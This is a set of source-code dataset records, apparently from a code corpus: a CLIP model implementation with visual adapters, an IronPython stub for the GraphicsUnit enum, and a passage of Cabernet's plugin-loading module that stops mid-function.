# batch * heads x (seq_len + image_len) x (seq_len + image_len)
text_mask = text_mask.unsqueeze(1).expand(text_mask.size(0), text_mask.size(1), text_mask.size(1))
x = self.transformer(joint_embeddings, text_mask=text_mask)
else:
# only run the plain transformer when no text stream is prepended
x = self.transformer(x)
x = x.permute(1, 0, 2) # LND -> NLD
if skip_last_layer:
x = self.ln_post(x)
else:
x = x @ self.proj
return x
class CLIP(nn.Module):
def __init__(self,
embed_dim: int,
# vision
image_resolution: int,
vision_layers: Union[Tuple[int, int, int, int], int],
vision_width: int,
vision_patch_size: int,
# text
context_length: int,
vocab_size: int,
transformer_width: int,
transformer_heads: int,
transformer_layers: int,
adapter_config,
):
super().__init__()
self.context_length = context_length
if isinstance(vision_layers, (tuple, list)):
vision_heads = vision_width * 32 // 64
self.visual = ModifiedResNet(
layers=vision_layers,
output_dim=embed_dim,
heads=vision_heads,
input_resolution=image_resolution,
width=vision_width,
adapter_config=adapter_config,
)
else:
vision_heads = vision_width // 64
self.visual = VisualTransformer(
input_resolution=image_resolution,
patch_size=vision_patch_size,
width=vision_width,
layers=vision_layers,
heads=vision_heads,
output_dim=embed_dim
)
self.transformer = Transformer(
width=transformer_width,
layers=transformer_layers,
heads=transformer_heads,
attn_mask=self.build_attention_mask()
)
self.vocab_size = vocab_size
self.token_embedding = nn.Embedding(vocab_size, transformer_width)
self.positional_embedding = nn.Parameter(torch.empty(self.context_length, transformer_width))
self.ln_final = LayerNorm(transformer_width)
self.text_projection = nn.Parameter(torch.empty(transformer_width, embed_dim))
self.logit_scale = nn.Parameter(torch.ones([]))
self.initialize_parameters()
def initialize_parameters(self):
nn.init.normal_(self.token_embedding.weight, std=0.02)
nn.init.normal_(self.positional_embedding, std=0.01)
if isinstance(self.visual, ModifiedResNet):
if self.visual.attnpool is not None:
std = self.visual.attnpool.c_proj.in_features ** -0.5
nn.init.normal_(self.visual.attnpool.q_proj.weight, std=std)
nn.init.normal_(self.visual.attnpool.k_proj.weight, std=std)
nn.init.normal_(self.visual.attnpool.v_proj.weight, std=std)
nn.init.normal_(self.visual.attnpool.c_proj.weight, std=std)
for resnet_block in [self.visual.layer1, self.visual.layer2, self.visual.layer3, self.visual.layer4]:
for name, param in resnet_block.named_parameters():
if name.endswith("bn3.weight"):
nn.init.zeros_(param)
proj_std = (self.transformer.width ** -0.5) * ((2 * self.transformer.layers) ** -0.5)
attn_std = self.transformer.width ** -0.5
fc_std = (2 * self.transformer.width) ** -0.5
for block in self.transformer.resblocks:
nn.init.normal_(block.attn.in_proj_weight, std=attn_std)
nn.init.normal_(block.attn.out_proj.weight, std=proj_std)
nn.init.normal_(block.mlp.c_fc.weight, std=fc_std)
nn.init.normal_(block.mlp.c_proj.weight, std=proj_std)
if self.text_projection is not None:
nn.init.normal_(self.text_projection, std=self.transformer.width ** -0.5)
def build_attention_mask(self):
# lazily create causal attention mask, with full attention between the vision tokens
# pytorch uses additive attention mask; fill with -inf
mask = torch.empty(self.context_length, self.context_length)
mask.fill_(float("-inf"))
mask.triu_(1) # zero out the lower diagonal
return mask
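# For context_length == 3 the additive mask built above is:
#
#   [[0., -inf, -inf],
#    [0.,   0., -inf],
#    [0.,   0.,   0.]]
#
# i.e. each token may attend to itself and earlier positions only.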
@property
def dtype(self):
return self.visual.conv1.weight.dtype
def encode_image(self, image):
return self.visual(image.type(self.dtype))
def encode_text(self, text):
x = self.token_embedding(text).type(self.dtype) # [batch_size, n_ctx, d_model]
x = x + self.positional_embedding.type(self.dtype)
x = x.permute(1, 0, 2) # NLD -> LND
x = self.transformer(x)
x = x.permute(1, 0, 2) # LND -> NLD
x = self.ln_final(x).type(self.dtype)
# x.shape = [batch_size, n_ctx, transformer.width]
# take features from the eot embedding (eot_token is the highest number in each sequence)
x = x[torch.arange(x.shape[0]), text.argmax(dim=-1)] @ self.text_projection
return x
def forward(self, image, text):
image_features = self.encode_image(image)
text_features = self.encode_text(text)
# normalized features
image_features = image_features / image_features.norm(dim=-1, keepdim=True)
text_features = text_features / text_features.norm(dim=-1, keepdim=True)
# cosine similarity as logits
logit_scale = self.logit_scale.exp()
logits_per_image = logit_scale * image_features @ text_features.t()
logits_per_text = logit_scale * text_features @ image_features.t()
# shape = [global_batch_size, global_batch_size]
return logits_per_image, logits_per_text
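# Shape sketch for the similarity logits, assuming a model built with CLIP's
# usual 224-px resolution, 77-token context and 49408-token vocabulary (these
# are assumptions for illustration, not values read from this file):
#
#   imgs = torch.randn(4, 3, 224, 224)          # batch of 4 images
#   toks = torch.randint(0, 49408, (4, 77))     # batch of 4 tokenized captions
#   logits_i, logits_t = model(imgs, toks)      # both are 4 x 4
#
# Row i of logits_i scores image i against every caption; logits_t is its
# transpose, scaled by the same learned temperature.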
def convert_weights(model: nn.Module):
"""Convert applicable model parameters to fp16"""
def _convert_weights_to_fp16(l):
if isinstance(l, (nn.Conv1d, nn.Conv2d, nn.Linear)):
l.weight.data = l.weight.data.half()
if l.bias is not None:
l.bias.data = l.bias.data.half()
if isinstance(l, nn.MultiheadAttention):
for attr in [*[f"{s}_proj_weight" for s in ["in", "q", "k", "v"]], "in_proj_bias", "bias_k", "bias_v"]:
tensor = getattr(l, attr)
if tensor is not None:
tensor.data = tensor.data.half()
for name in ["text_projection", "proj"]:
if hasattr(l, name):
attr = getattr(l, name)
if attr is not None:
attr.data = attr.data.half()
model.apply(_convert_weights_to_fp16)
def build_model(state_dict: dict, adapter_config):
vit = "visual.proj" in state_dict
if vit:
vision_width = state_dict["visual.conv1.weight"].shape[0]
vision_layers = len([k for k in state_dict.keys() if k.startswith("visual.") and k.endswith(".attn.in_proj_weight")])
vision_patch_size = state_dict["visual.conv1.weight"].shape[-1]
grid_size = round((state_dict["visual.positional_embedding"].shape[0] - 1) ** 0.5)
image_resolution = vision_patch_size * grid_size
else:
counts: list = [len(set(k.split(".")[2] for k in state_dict if k.startswith(f"visual.layer{b}"))) for b in [1, 2, 3, 4]]
vision_layers = tuple(counts)
vision_width = state_dict["visual.layer1.0.conv1.weight"].shape[0]
output_width = round((state_dict["visual.attnpool.positional_embedding"].shape[0] - 1) ** 0.5)
vision_patch_size = None
assert output_width ** 2 + 1 == state_dict["visual.attnpool.positional_embedding"].shape[0]
image_resolution = output_width * 32
embed_dim = state_dict["text_projection"].shape[1]
context_length = state_dict["positional_embedding"].shape[0]
vocab_size = state_dict["token_embedding.weight"].shape[0]
transformer_width = state_dict["ln_final.weight"].shape[0]
transformer_heads = transformer_width // 64
transformer_layers = len(set(k.split(".")[2] for k in state_dict if k.startswith(f"transformer.resblocks")))
model = CLIP(
embed_dim,
image_resolution, vision_layers, vision_width, vision_patch_size,
context_length, vocab_size, transformer_width, transformer_heads, transformer_layers,
adapter_config
)
for key in ["input_resolution", "context_length", "vocab_size"]:
del state_dict[key]
#convert_weights(model)
# model.load_state_dict(state_dict)
try:
model.load_state_dict(state_dict)
except RuntimeError as err:
print("Some keys are mismatched")
err = str(err).split("\n", 1)[1]
print(err)
model.load_state_dict(state_dict, strict=False)
return model.eval()
| 39.531073
| 178
| 0.616216
|
from collections import OrderedDict
from typing import Tuple, Union
import torch
import torch.nn.functional as F
from torch import nn
class VisualAdapter(nn.Module):
def __init__(self, input_dim, output_dim, adapter_kind, reduction_factor=16, use_bn=True, use_gate=True):
super().__init__()
self.adapter_kind = adapter_kind
self.use_bn = use_bn
if use_gate:
self.gate = nn.Parameter(torch.zeros(1))
else:
self.gate = None
if adapter_kind == "bottleneck":
self.down_sample_size = input_dim // reduction_factor
self.activation = nn.ReLU(inplace=True)
self.down_sampler = nn.Conv2d(input_dim, self.down_sample_size, 1, bias=False)
self.up_sampler = nn.Conv2d(self.down_sample_size, output_dim, 1, bias=False)
if use_bn:
self.bn1 = nn.BatchNorm2d(self.down_sample_size)
self.bn2 = nn.BatchNorm2d(output_dim)
elif adapter_kind == "basic":
self.activation = nn.ReLU(inplace=True)
self.conv = nn.Conv2d(input_dim, output_dim, 1, bias=False)
if use_bn:
self.bn = nn.BatchNorm2d(output_dim)
else:
raise NotImplementedError
def forward(self, x):
if self.adapter_kind == "bottleneck":
z = self.down_sampler(x)
z = self.bn1(z) if self.use_bn else z
z = self.activation(z)
output = self.up_sampler(z)
output = self.bn2(output) if self.use_bn else output
elif self.adapter_kind == "basic":
output = self.conv(x)
output = self.bn(output) if self.use_bn else output
if self.gate is not None:
output = self.gate * output
return output
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, adapter_config=None):
super().__init__()
self.conv1 = nn.Conv2d(inplanes, planes, 1, bias=False)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, 3, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.avgpool = nn.AvgPool2d(stride) if stride > 1 else nn.Identity()
self.conv3 = nn.Conv2d(planes, planes * self.expansion, 1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = None
self.stride = stride
self.adapter = None
if adapter_config is not None:
self.adapter = VisualAdapter(planes, planes, "basic", adapter_config.reduction_factor, True, adapter_config.use_gate)
if stride > 1 or inplanes != planes * Bottleneck.expansion:
self.downsample = nn.Sequential(OrderedDict([
("-1", nn.AvgPool2d(stride)),
("0", nn.Conv2d(inplanes, planes * self.expansion, 1, stride=1, bias=False)),
("1", nn.BatchNorm2d(planes * self.expansion))
]))
def forward(self, x: torch.Tensor):
identity = x
out = self.relu(self.bn1(self.conv1(x)))
if self.adapter is not None:
adapter_out = self.adapter(out)
out = self.bn2(self.conv2(out))
out = self.relu(adapter_out + out)
else:
out = self.relu(self.bn2(self.conv2(out)))
out = self.avgpool(out)
out = self.bn3(self.conv3(out))
if self.downsample is not None:
identity = self.downsample(x)
out += identity
out = self.relu(out)
return out
class AttentionPool2d(nn.Module):
def __init__(self, spacial_dim: int, embed_dim: int, num_heads: int, output_dim: int = None):
super().__init__()
self.positional_embedding = nn.Parameter(torch.randn(spacial_dim ** 2 + 1, embed_dim) / embed_dim ** 0.5)
self.k_proj = nn.Linear(embed_dim, embed_dim)
self.q_proj = nn.Linear(embed_dim, embed_dim)
self.v_proj = nn.Linear(embed_dim, embed_dim)
self.c_proj = nn.Linear(embed_dim, output_dim or embed_dim)
self.num_heads = num_heads
def forward(self, x):
x = x.reshape(x.shape[0], x.shape[1], x.shape[2] * x.shape[3]).permute(2, 0, 1)
x = torch.cat([x.mean(dim=0, keepdim=True), x], dim=0)
x = x + self.positional_embedding[:, None, :].to(x.dtype)
x, _ = F.multi_head_attention_forward(
query=x, key=x, value=x,
embed_dim_to_check=x.shape[-1],
num_heads=self.num_heads,
q_proj_weight=self.q_proj.weight,
k_proj_weight=self.k_proj.weight,
v_proj_weight=self.v_proj.weight,
in_proj_weight=None,
in_proj_bias=torch.cat([self.q_proj.bias, self.k_proj.bias, self.v_proj.bias]),
bias_k=None,
bias_v=None,
add_zero_attn=False,
dropout_p=0,
out_proj_weight=self.c_proj.weight,
out_proj_bias=self.c_proj.bias,
use_separate_proj_weight=True,
training=self.training,
need_weights=False
)
return x[0]
class ModifiedResNet(nn.Module):
def __init__(self, layers, output_dim, heads, input_resolution=224, width=64, adapter_config=None):
super().__init__()
self.output_dim = output_dim
self.input_resolution = input_resolution
self.adapter_config = adapter_config
self.conv1 = nn.Conv2d(3, width // 2, kernel_size=3, stride=2, padding=1, bias=False)
self.bn1 = nn.BatchNorm2d(width // 2)
self.conv2 = nn.Conv2d(width // 2, width // 2, kernel_size=3, padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(width // 2)
self.conv3 = nn.Conv2d(width // 2, width, kernel_size=3, padding=1, bias=False)
self.bn3 = nn.BatchNorm2d(width)
self.avgpool = nn.AvgPool2d(2)
self.relu = nn.ReLU(inplace=True)
self._inplanes = width
self.layer1 = self._make_layer(width, layers[0])
self.layer2 = self._make_layer(width * 2, layers[1], stride=2)
self.layer3 = self._make_layer(width * 4, layers[2], stride=2)
self.layer4 = self._make_layer(width * 8, layers[3], stride=2)
embed_dim = width * 32
self.attnpool = AttentionPool2d(input_resolution // 32, embed_dim, heads, output_dim)
def _make_layer(self, planes, blocks, stride=1):
layers = [Bottleneck(self._inplanes, planes, stride, adapter_config=self.adapter_config)]
self._inplanes = planes * Bottleneck.expansion
for _ in range(1, blocks):
layers.append(Bottleneck(self._inplanes, planes, adapter_config=self.adapter_config))
return nn.Sequential(*layers)
def forward(self, x, skip_last_layer=False):
def stem(x):
for conv, bn in [(self.conv1, self.bn1), (self.conv2, self.bn2), (self.conv3, self.bn3)]:
x = self.relu(bn(conv(x)))
x = self.avgpool(x)
return x
x = x.type(self.conv1.weight.dtype)
x = stem(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
if not skip_last_layer:
x = self.attnpool(x)
return x
class LayerNorm(nn.LayerNorm):
def forward(self, x: torch.Tensor):
orig_type = x.dtype
ret = super().forward(x.type(torch.float32))
return ret.type(orig_type)
class QuickGELU(nn.Module):
def forward(self, x: torch.Tensor):
return x * torch.sigmoid(1.702 * x)
class ResidualAttentionBlock(nn.Module):
def __init__(self, d_model: int, n_head: int, attn_mask: torch.Tensor = None):
super().__init__()
self.attn = nn.MultiheadAttention(d_model, n_head)
self.ln_1 = LayerNorm(d_model)
self.mlp = nn.Sequential(OrderedDict([
("c_fc", nn.Linear(d_model, d_model * 4)),
("gelu", QuickGELU()),
("c_proj", nn.Linear(d_model * 4, d_model))
]))
self.ln_2 = LayerNorm(d_model)
self.attn_mask = attn_mask
def attention(self, x: torch.Tensor, text_mask=None):
if text_mask is None:
text_mask = self.attn_mask.to(dtype=x.dtype, device=x.device) if self.attn_mask is not None else None
return self.attn(x, x, x, need_weights=False, attn_mask=text_mask)[0]
def forward(self, x: torch.Tensor, text_mask = None):
x = x + self.attention(self.ln_1(x), text_mask = text_mask)
x = x + self.mlp(self.ln_2(x))
return x
class Transformer(nn.Module):
def __init__(self, width: int, layers: int, heads: int, attn_mask: torch.Tensor = None):
super().__init__()
self.width = width
self.layers = layers
self.resblocks = nn.Sequential(*[ResidualAttentionBlock(width, heads, attn_mask) for _ in range(layers)])
def forward(self, x: torch.Tensor, text_mask=None):
for layer in self.resblocks:
x = layer(x, text_mask = text_mask)
return x
class VisualTransformer(nn.Module):
def __init__(self, input_resolution: int, patch_size: int, width: int, layers: int, heads: int, output_dim: int):
super().__init__()
self.input_resolution = input_resolution
self.output_dim = output_dim
self.heads = heads
self.conv1 = nn.Conv2d(in_channels=3, out_channels=width, kernel_size=patch_size, stride=patch_size, bias=False)
scale = width ** -0.5
self.class_embedding = nn.Parameter(scale * torch.randn(width))
self.positional_embedding = nn.Parameter(scale * torch.randn((input_resolution // patch_size) ** 2 + 1, width))
self.ln_pre = LayerNorm(width)
self.transformer = Transformer(width, layers, heads)
self.ln_post = LayerNorm(width)
self.proj = nn.Parameter(scale * torch.randn(width, output_dim))
def forward(self, x: torch.Tensor, skip_last_layer=False, text_embedding=None, text_mask=None):
x = self.conv1(x)
x = x.reshape(x.shape[0], x.shape[1], -1)
x = x.permute(0, 2, 1)
x = torch.cat([self.class_embedding.to(x.dtype) + torch.zeros(x.shape[0], 1, x.shape[-1], dtype=x.dtype, device=x.device), x], dim=1)
x = x + self.positional_embedding.to(x.dtype)
x = self.ln_pre(x)
x = x.permute(1, 0, 2)
if text_embedding is not None:
text_embedding = text_embedding.transpose(0, 1)
joint_embeddings = torch.cat((text_embedding, x), dim=0)
text_mask = torch.cat(
(text_mask, torch.zeros(x.size(1), x.size(0)).float().to(x.device)),
dim=1)
text_mask = torch.cat([text_mask for i in range(self.heads)], dim=0)
text_mask = text_mask.unsqueeze(1).expand(text_mask.size(0), text_mask.size(1), text_mask.size(1))
x = self.transformer(joint_embeddings, text_mask=text_mask)
else:
x = self.transformer(x)
x = x.permute(1, 0, 2)
if skip_last_layer:
x = self.ln_post(x)
else:
x = x @ self.proj
return x
class CLIP(nn.Module):
def __init__(self,
embed_dim: int,
image_resolution: int,
vision_layers: Union[Tuple[int, int, int, int], int],
vision_width: int,
vision_patch_size: int,
context_length: int,
vocab_size: int,
transformer_width: int,
transformer_heads: int,
transformer_layers: int,
adapter_config,
):
super().__init__()
self.context_length = context_length
if isinstance(vision_layers, (tuple, list)):
vision_heads = vision_width * 32 // 64
self.visual = ModifiedResNet(
layers=vision_layers,
output_dim=embed_dim,
heads=vision_heads,
input_resolution=image_resolution,
width=vision_width,
adapter_config=adapter_config,
)
else:
vision_heads = vision_width // 64
self.visual = VisualTransformer(
input_resolution=image_resolution,
patch_size=vision_patch_size,
width=vision_width,
layers=vision_layers,
heads=vision_heads,
output_dim=embed_dim
)
self.transformer = Transformer(
width=transformer_width,
layers=transformer_layers,
heads=transformer_heads,
attn_mask=self.build_attention_mask()
)
self.vocab_size = vocab_size
self.token_embedding = nn.Embedding(vocab_size, transformer_width)
self.positional_embedding = nn.Parameter(torch.empty(self.context_length, transformer_width))
self.ln_final = LayerNorm(transformer_width)
self.text_projection = nn.Parameter(torch.empty(transformer_width, embed_dim))
self.logit_scale = nn.Parameter(torch.ones([]))
self.initialize_parameters()
def initialize_parameters(self):
nn.init.normal_(self.token_embedding.weight, std=0.02)
nn.init.normal_(self.positional_embedding, std=0.01)
if isinstance(self.visual, ModifiedResNet):
if self.visual.attnpool is not None:
std = self.visual.attnpool.c_proj.in_features ** -0.5
nn.init.normal_(self.visual.attnpool.q_proj.weight, std=std)
nn.init.normal_(self.visual.attnpool.k_proj.weight, std=std)
nn.init.normal_(self.visual.attnpool.v_proj.weight, std=std)
nn.init.normal_(self.visual.attnpool.c_proj.weight, std=std)
for resnet_block in [self.visual.layer1, self.visual.layer2, self.visual.layer3, self.visual.layer4]:
for name, param in resnet_block.named_parameters():
if name.endswith("bn3.weight"):
nn.init.zeros_(param)
proj_std = (self.transformer.width ** -0.5) * ((2 * self.transformer.layers) ** -0.5)
attn_std = self.transformer.width ** -0.5
fc_std = (2 * self.transformer.width) ** -0.5
for block in self.transformer.resblocks:
nn.init.normal_(block.attn.in_proj_weight, std=attn_std)
nn.init.normal_(block.attn.out_proj.weight, std=proj_std)
nn.init.normal_(block.mlp.c_fc.weight, std=fc_std)
nn.init.normal_(block.mlp.c_proj.weight, std=proj_std)
if self.text_projection is not None:
nn.init.normal_(self.text_projection, std=self.transformer.width ** -0.5)
def build_attention_mask(self):
mask = torch.empty(self.context_length, self.context_length)
mask.fill_(float("-inf"))
mask.triu_(1)
return mask
@property
def dtype(self):
return self.visual.conv1.weight.dtype
def encode_image(self, image):
return self.visual(image.type(self.dtype))
def encode_text(self, text):
x = self.token_embedding(text).type(self.dtype)
x = x + self.positional_embedding.type(self.dtype)
x = x.permute(1, 0, 2)
x = self.transformer(x)
x = x.permute(1, 0, 2)
x = self.ln_final(x).type(self.dtype)
x = x[torch.arange(x.shape[0]), text.argmax(dim=-1)] @ self.text_projection
return x
def forward(self, image, text):
image_features = self.encode_image(image)
text_features = self.encode_text(text)
image_features = image_features / image_features.norm(dim=-1, keepdim=True)
text_features = text_features / text_features.norm(dim=-1, keepdim=True)
logit_scale = self.logit_scale.exp()
logits_per_image = logit_scale * image_features @ text_features.t()
logits_per_text = logit_scale * text_features @ image_features.t()
return logits_per_image, logits_per_text
def convert_weights(model: nn.Module):
def _convert_weights_to_fp16(l):
if isinstance(l, (nn.Conv1d, nn.Conv2d, nn.Linear)):
l.weight.data = l.weight.data.half()
if l.bias is not None:
l.bias.data = l.bias.data.half()
if isinstance(l, nn.MultiheadAttention):
for attr in [*[f"{s}_proj_weight" for s in ["in", "q", "k", "v"]], "in_proj_bias", "bias_k", "bias_v"]:
tensor = getattr(l, attr)
if tensor is not None:
tensor.data = tensor.data.half()
for name in ["text_projection", "proj"]:
if hasattr(l, name):
attr = getattr(l, name)
if attr is not None:
attr.data = attr.data.half()
model.apply(_convert_weights_to_fp16)
def build_model(state_dict: dict, adapter_config):
vit = "visual.proj" in state_dict
if vit:
vision_width = state_dict["visual.conv1.weight"].shape[0]
vision_layers = len([k for k in state_dict.keys() if k.startswith("visual.") and k.endswith(".attn.in_proj_weight")])
vision_patch_size = state_dict["visual.conv1.weight"].shape[-1]
grid_size = round((state_dict["visual.positional_embedding"].shape[0] - 1) ** 0.5)
image_resolution = vision_patch_size * grid_size
else:
counts: list = [len(set(k.split(".")[2] for k in state_dict if k.startswith(f"visual.layer{b}"))) for b in [1, 2, 3, 4]]
vision_layers = tuple(counts)
vision_width = state_dict["visual.layer1.0.conv1.weight"].shape[0]
output_width = round((state_dict["visual.attnpool.positional_embedding"].shape[0] - 1) ** 0.5)
vision_patch_size = None
assert output_width ** 2 + 1 == state_dict["visual.attnpool.positional_embedding"].shape[0]
image_resolution = output_width * 32
embed_dim = state_dict["text_projection"].shape[1]
context_length = state_dict["positional_embedding"].shape[0]
vocab_size = state_dict["token_embedding.weight"].shape[0]
transformer_width = state_dict["ln_final.weight"].shape[0]
transformer_heads = transformer_width // 64
transformer_layers = len(set(k.split(".")[2] for k in state_dict if k.startswith(f"transformer.resblocks")))
model = CLIP(
embed_dim,
image_resolution, vision_layers, vision_width, vision_patch_size,
context_length, vocab_size, transformer_width, transformer_heads, transformer_layers,
adapter_config
)
for key in ["input_resolution", "context_length", "vocab_size"]:
del state_dict[key]
try:
model.load_state_dict(state_dict)
except RuntimeError as err:
print("Some keys are mismatched")
err = str(err).split("\n", 1)[1]
print(err)
model.load_state_dict(state_dict, strict=False)
return model.eval()
| true
| true
|
1c40e7ccbe64aab0ac0834414cef864c92ed5b6a
| 1,073
|
py
|
Python
|
release/stubs.min/System/Drawing/__init___parts/GraphicsUnit.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 182
|
2017-06-27T02:26:15.000Z
|
2022-03-30T18:53:43.000Z
|
release/stubs.min/System/Drawing/__init___parts/GraphicsUnit.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 28
|
2017-06-27T13:38:23.000Z
|
2022-03-15T11:19:44.000Z
|
release/stubs.min/System/Drawing/__init___parts/GraphicsUnit.py
|
htlcnn/ironpython-stubs
|
780d829e2104b2789d5f4d6f32b0ec9f2930ca03
|
[
"MIT"
] | 67
|
2017-06-28T09:43:59.000Z
|
2022-03-20T21:17:10.000Z
|
class GraphicsUnit(Enum,IComparable,IFormattable,IConvertible):
"""
Specifies the unit of measure for the given data.
enum GraphicsUnit,values: Display (1),Document (5),Inch (4),Millimeter (6),Pixel (2),Point (3),World (0)
"""
def __eq__(self,*args):
""" x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """
pass
def __format__(self,*args):
""" __format__(formattable: IFormattable,format: str) -> str """
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Display=None
Document=None
Inch=None
Millimeter=None
Pixel=None
Point=None
value__=None
World=None
| 26.170732
| 215
| 0.661696
|
class GraphicsUnit(Enum,IComparable,IFormattable,IConvertible):
def __eq__(self,*args):
pass
def __format__(self,*args):
pass
def __ge__(self,*args):
pass
def __gt__(self,*args):
pass
def __init__(self,*args):
pass
def __le__(self,*args):
pass
def __lt__(self,*args):
pass
def __ne__(self,*args):
pass
def __reduce_ex__(self,*args):
pass
def __str__(self,*args):
pass
Display=None
Document=None
Inch=None
Millimeter=None
Pixel=None
Point=None
value__=None
World=None
| true
| true
|
1c40e7f353d277cb2619d721b37441b276b9c6af
| 7,330
|
py
|
Python
|
lib/plugins/plugin.py
|
cookieisland/cabernet
|
9f429fe7a75707da97133b7ec4b3cf6b7aaec6cd
|
[
"MIT"
] | 16
|
2021-08-30T07:05:28.000Z
|
2022-03-04T06:46:42.000Z
|
lib/plugins/plugin.py
|
cookieisland/cabernet
|
9f429fe7a75707da97133b7ec4b3cf6b7aaec6cd
|
[
"MIT"
] | 7
|
2021-08-30T01:33:52.000Z
|
2022-03-23T10:19:38.000Z
|
lib/plugins/plugin.py
|
cookieisland/cabernet
|
9f429fe7a75707da97133b7ec4b3cf6b7aaec6cd
|
[
"MIT"
] | 9
|
2021-08-29T21:49:03.000Z
|
2022-03-12T19:59:29.000Z
|
"""
MIT License
Copyright (C) 2021 ROCKY4546
https://github.com/rocky4546
This file is part of Cabernet
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute,
sublicense, and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
"""
import logging
import json
import importlib
import importlib.resources
import lib.common.utils as utils
import lib.common.exceptions as exceptions
from lib.config.config_defn import ConfigDefn
from lib.db.db_plugins import DBPlugins
from lib.db.db_config_defn import DBConfigDefn
PLUGIN_CONFIG_DEFN_FILE = 'config_defn.json'
PLUGIN_INSTANCE_DEFN_FILE = 'instance_defn.json'
PLUGIN_MANIFEST_FILE = 'plugin.json'
def register(func):
"""Decorator for registering a new plugin"""
Plugin._plugin_func = func
return func
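# Sketch of how a plugin module would use the decorator (the setup name and
# signature here are illustrative, not taken from a real plugin):
#
#   from lib.plugins.plugin import register
#
#   @register
#   def setup(plugin_obj):
#       pass  # initialize the plugin here
#
# Plugin.__init__ then picks the registered function up via Plugin._plugin_func.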
class Plugin:
# Temporarily used to register the plugin setup() function
_plugin_func = None
logger = None
def __init__(self, _config_obj, _plugin_defn, _plugin_path):
if Plugin.logger is None:
Plugin.logger = logging.getLogger(__name__)
self.enabled = True
self.plugin_path = _plugin_path
self.config_obj = _config_obj
self.db_configdefn = DBConfigDefn(_config_obj.data)
self.load_config_defn()
# plugin is registered after this call, so grab reg data
self.init_func = Plugin._plugin_func
self.plugin_settings = {}
self.plugin_db = DBPlugins(_config_obj.data)
self.namespace = None
self.instances = []
self.load_plugin_manifest(_plugin_defn)
self.plugin_obj = None
if not self.config_obj.data[self.namespace.lower()]['enabled']:
self.enabled = False
self.logger.debug('Plugin disabled in config.ini for {}'.format(self.name))
return
self.load_instances()
self.logger.notice('Plugin created for {}'.format(self.name))
def load_config_defn(self):
try:
self.logger.debug(
'Plugin Config Defn file loaded at {}'.format(self.plugin_path))
defn_obj = ConfigDefn(self.plugin_path, PLUGIN_CONFIG_DEFN_FILE, self.config_obj.data)
default_config = defn_obj.get_default_config()
self.config_obj.merge_config(default_config)
defn_obj.call_oninit(self.config_obj)
self.config_obj.defn_json.merge_defn_obj(defn_obj)
for area, area_data in defn_obj.config_defn.items():
for section, section_data in area_data['sections'].items():
for setting in section_data['settings'].keys():
new_value = self.config_obj.fix_value_type(
section, setting, self.config_obj.data[section][setting])
self.config_obj.data[section][setting] = new_value
self.db_configdefn.add_config(self.config_obj.data)
defn_obj.terminate()
except FileNotFoundError:
self.logger.warning(
'PLUGIN CONFIG DEFN FILE NOT FOUND AT {}'.format(self.plugin_path))
def load_instances(self):
inst_defn_obj = ConfigDefn(self.plugin_path, PLUGIN_INSTANCE_DEFN_FILE, self.config_obj.data, True)
# Determine from the config data whether an instance of this name exists; its section name would be '<namespace>_<instance>'
self.instances = self.find_instances()
if len(self.instances) == 0:
self.enabled = False
self.config_obj.data[self.namespace.lower()]['enabled'] = False
self.logger.info('No instances found, disabling plugin {}'.format(self.namespace))
return
for inst in self.instances:
self.plugin_db.save_instance(self.namespace, inst, '')
# Create a defn whose section name carries the instance suffix, then process it.
inst_defn_obj.is_instance_defn = False
for area, area_data in inst_defn_obj.config_defn.items():
if len(area_data['sections']) != 1:
self.logger.error('INSTANCE MUST HAVE ONE AND ONLY ONE SECTION')
raise exceptions.CabernetException('plugin defn must have one and only one instance section')
section = list(area_data['sections'].keys())[0]
base_section = section.split('_', 1)[0]
area_data['sections'][base_section + '_' + inst] = area_data['sections'].pop(section)
if 'label' in self.config_obj.data[base_section + '_' + inst] \
and self.config_obj.data[base_section + '_' + inst]['label'] is not None:
area_data['sections'][base_section + '_' + inst]['label'] = self.config_obj.data[base_section + '_' + inst]['label']
inst_defn_obj.save_defn_to_db()
default_config = inst_defn_obj.get_default_config()
self.config_obj.merge_config(default_config)
inst_defn_obj.call_oninit(self.config_obj)
self.config_obj.defn_json.merge_defn_obj(inst_defn_obj)
for area, area_data in inst_defn_obj.config_defn.items():
for section, section_data in area_data['sections'].items():
for setting in section_data['settings'].keys():
new_value = self.config_obj.fix_value_type(
section, setting, self.config_obj.data[section][setting])
self.config_obj.data[section][setting] = new_value
self.db_configdefn.add_config(self.config_obj.data)
def find_instances(self):
instances = []
inst_sec = self.namespace.lower() + '_'
for section in self.config_obj.data.keys():
if section.startswith(inst_sec):
instances.append(section.split(inst_sec, 1)[1])
return instances
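# Example: with namespace 'TVGuide', config sections named 'tvguide_main' and
# 'tvguide_backup' (hypothetical names) would yield
# find_instances() == ['main', 'backup'].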
def load_plugin_manifest(self, _plugin_defn):
self.load_default_settings(_plugin_defn)
self.import_manifest()
def load_default_settings(self, _plugin_defn):
for name, attr in _plugin_defn.items():
self.plugin_settings[name] = attr['default']
def import_manifest(self):
try:
json_settings = importlib.resources.read_text(self.plugin_path, PLUGIN_MANIFEST_FILE)
settings = json.loads(json_settings)
self.namespace = settings['name']
self.plugin_db.save_plugin(settings)
self.logger.debug(
